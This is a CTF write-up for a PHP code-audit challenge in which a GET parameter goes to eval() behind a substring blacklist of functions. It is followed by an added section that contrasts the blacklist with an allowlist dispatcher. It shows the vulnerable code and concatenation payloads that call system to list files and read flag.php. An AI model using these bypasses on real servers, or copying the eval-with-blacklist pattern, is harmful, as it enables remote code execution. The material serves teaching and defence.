Web - File Inclusion 1
This time we work through a web code-audit challenge; it is fairly simple. Below is the code to audit.
<?php
show_source(__FILE__);
error_reporting(0);
$disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
$disable_fun = array_merge($disable_fun, get_defined_functions()['internal']);
foreach($disable_fun as $i){
    if(stristr($_GET[shell], $i)!==false){
        die('ctf');
    }
}
eval($_GET[shell]);
Analyze the code in order.

<?php
// Print the source of this file
show_source(__FILE__);
// Turn off error reporting
error_reporting(0);
// Define a list holding the functions typically abused when exploiting file inclusion
$disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir", "exec","proc_open", "error_log", "ini_alter", "ini_set", "pfsockopen", "readfile", "echo", "file_get_contents", "readlink", "symlink", "popen", "fopen", "file", "fpassthru"];
// array_merge() merges one or more arrays, appending the values of each array to the end of the previous one;
// get_defined_functions() lists all functions and returns a two-dimensional array
$disable_fun = array_merge($disable_fun, get_defined_functions()['internal']);
// foreach() iterates over the array
foreach($disable_fun as $i){
    // stristr() finds the first occurrence of a string inside another string, case-insensitively
    if(stristr($_GET[shell], $i)!==false){
        die('ctf');
    }
}
// Execute the contents of the shell parameter as PHP code
eval($_GET[shell]);
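First payload (the function name is split by string concatenation, so no blacklisted name appears literally in the input):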
$a='sys'.'tem';$a("ls");
This returns the directory listing:
dhudndrgrhs.php flag.php index.php
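Next, build a payload that reads the contents of flag.php. Note that nothing is echoed on the rendered page here; you have to view the page source to see the output.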
$a='syst'.'em';$a("cat flag.php");
After viewing the page source, the flag is at the very bottom.
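
Why the blacklist above fails, and what replaces it, as an added example that is not part of the original challenge or write-up: the filter is modelled as a function and run over a literal call and over the page's first payload, next to an allowlist dispatcher that never evaluates the parameter. The names `blacklist_allows` and `dispatch`, the two sample actions and the shortened explicit list are assumptions made for illustration.

```php
<?php
// Added example: the page's substring blacklist modelled as a function,
// contrasted with an allowlist dispatcher. Helper names are hypothetical.

// Same logic as the challenge: reject input that contains any listed
// name as a case-insensitive substring.
function blacklist_allows(string $input, array $names): bool
{
    foreach ($names as $name) {
        if (stristr($input, $name) !== false) {
            return false;
        }
    }
    return true;
}

// Hardened alternative (assumption): the parameter only selects a
// predefined action by exact key; it is never passed to eval().
function dispatch(string $action): string
{
    $actions = [
        'time'    => fn(): string => date('c'),
        'version' => fn(): string => PHP_VERSION,
    ];
    if (!array_key_exists($action, $actions)) {
        return 'rejected';
    }
    return $actions[$action]();
}

// List built the same way as in the challenge (explicit list shortened here).
$names = array_merge(['assert', 'system', 'exec', 'echo'],
                     get_defined_functions()['internal']);

// Constructed sample inputs.
$samples = [
    'system("ls");',                 // function name appears literally
    '$a=\'sys\'.\'tem\';$a("ls");',  // the page's payload: name is only assembled at run time
];

foreach ($samples as $s) {
    printf("%-28s blacklist_allows=%-5s dispatch=%s\n",
        $s, var_export(blacklist_allows($s, $names), true), dispatch($s));
}
printf("%-28s dispatch=%s\n", 'version', dispatch('version'));
```

The filter inspects the text of the input while `eval()` acts on what that text computes, so any name-based list can be sidestepped; the dispatcher closes the gap by accepting only exact keys it already knows.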